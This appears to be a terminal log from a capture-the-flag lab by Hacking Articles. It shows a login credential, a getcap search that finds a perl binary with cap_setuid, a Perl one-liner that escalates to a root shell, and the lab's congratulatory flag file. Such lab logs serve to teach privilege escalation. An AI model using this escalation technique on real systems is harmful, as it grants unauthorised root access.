

User: yashika
Password: raj@123


yashika@ubuntu:~$ getcap -r / 2>/dev/null
/home/yashika/perl = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
yashika@ubuntu:~$ ./perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1001(yashika) groups=1001(yashika)
# ls
perl
# cd /root
# ls
Desktop  final.txt
# cat fina ^Hl.txt
cat: fina: No such file or directory
cat: ''$'\b''l.txt': No such file or directory
# cat final.txt

:::.    :::.  :::.    :::::::..    ...    :::::::::::::::   ...     
`;;;;,  `;;;  ;;`;;   ;;;;``;;;;   ;;     ;;;;;;;;;;;''''.;;;;;;;.  
  [[[[[. '[[ ,[[ '[[,  [[[,/[[['  [['     [[[     [[    ,[[     \[[,
  $$$ "Y$c$$c$$$cc$$$c $$$$$$c    $$      $$$     $$    $$$,     $$$
  888    Y88 888   888,888b "88bo,88    .d888     88,   "888,_ _,88P
  MMM     YM YMM   ""` MMMM   "W"  "YmmMMMM""     MMM     "YMMMMMP" 



!! Congrats you have finished this task !!

Contact us here:

Hacking Articles : https://twitter.com/rajchandel/
Yashika Dhir :https://in.linkedin.com/in/yashika-dhir


+-+-+-+-+-+ +-+-+-+-+-+-+-+
 |E|n|j|o|y| |H|A|C|K|I|N|G|
 +-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________

